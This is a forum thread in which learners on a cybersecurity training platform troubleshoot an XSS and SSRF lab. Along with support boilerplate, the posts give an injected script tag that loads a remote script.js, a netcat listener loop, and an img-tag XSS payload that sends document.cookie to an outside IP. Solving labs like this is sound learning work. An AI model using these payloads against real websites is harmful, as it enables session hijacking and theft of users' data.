Forum Discussion
- These replies have been moved.
- TillyCorlessCommunity Manager
Hey johndoe321 I'm pleased that CyberSharpe was able to help you here! If you found their reply useful, please don't forget to mark it as a Solution β
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
- johndoe321Bronze I
I have done the following so far:
- Identify the wildcard cycles employee user ID & token
- Host the http server using the python module (port 8080)
- Create a script.js file w/ the code provided in the Briefing section w/ the XMLHttpRequest object's open method's url parameter set to /admin/token instead of /users/data (tried setting this many different things including http://{ip of employee machine}/admin/token, /{employee id}/{token} -
- All the while having the nc -vnlp 5555 looping in an infinite while loop
On the terminal monitoring the http server activity, I see a GET /script.js every ~60s or so, and each time that happens, the nc listening on 5555 shows the same keepalive traffic w/ the same user ID & token information, but not the contents of the actual /admin/token page...
I have a feeling I am missing something in item 3 listed above - something not right w/ how i have the script.js payload set up...
Been stuck on this for way longer than I care to, any guidance would be greatly appreciated.
- CyberSharpeBronze III
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
- johndoe321Bronze I
Wow that did it instantly, thank you CyberSharpe!! Guess 5555 is already in-use/bound to the first exploit...
- natelottBronze I
They key is knowing that you have to use python to host the remote .js file in parallel with netcat to listen for the response of the XSS malicious scripts. Additionally, there are two steps to expose the data. One exposes the username and token cookie (question 1&2) in the query parameters. The other displays the token in the html body. The example code snippets work with VERY minor modifications. One thing I did based on feedback from a peer, was to wrap Netcat in a look to keep it active in terminal for subsequent requests.
- CyberSharpeBronze III
Agreed.
Run XSS exploit ensure your script allows this to loop with NC listening. Name and cookie given instantly. Then i hosted the payload using http.server and conducted SSRF this time using a different port number and NC. This dropped the full body then a cyber chef URLDecode the answer is available.
The actual script doesnβt need much work.
- NyePriorImmerser
- natelottBronze I
NyePriorThanks for the reply. I also tried this method. I used ip address from ifconfig, local host (127.0.0.1), and 0.0.0.0 got the same result. If that were the case, how am I able to open the js file in the browser using http://0.0.0.0:8080/script.js url? The JS is executing when I expose the vulnerability and I can see the request happen in netcat... Therefore I feel confident that the issue is inside the js file or with the /admin/token itself. I have tried the python method and the netcat method. The /admin/token endpoint gets me a 302 permanent redirect. As a python full stack developer w/ a good understanding of accessing local host as a local web server... I think I'm missing something else or not understanding the flow completely.
- natelottBronze I
Having the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.
Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.
Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>
- me5382Bronze I
I am also having problems on this lesson. So far I haven't been able to get the site to execute any new code
I tried running the hint from below as well as the following:
<script src="http://0.0.0.0:8080/script.js"></script>
My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).
I am sure I must be misunderstanding something, any help would be appreciated.- KieranRowleyCommunity Manager
- KieranRowleyCommunity Manager
Hi shubham did the information above help?
If so, please don't forget to mark it as a Solution β
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
- ChrisKershawCommunity Support
Hey shubham
Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt π.
I'll be happy to share a hint to help you with your lab attempt:
In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>
Will you see if this helps you with your attempt? - KieranRowleyCommunity Manager
Hi shubham welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
- shubhamBronze I
Thanks for welcome.
So I tire using netcat with the payload in message to make a reverse connection
Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>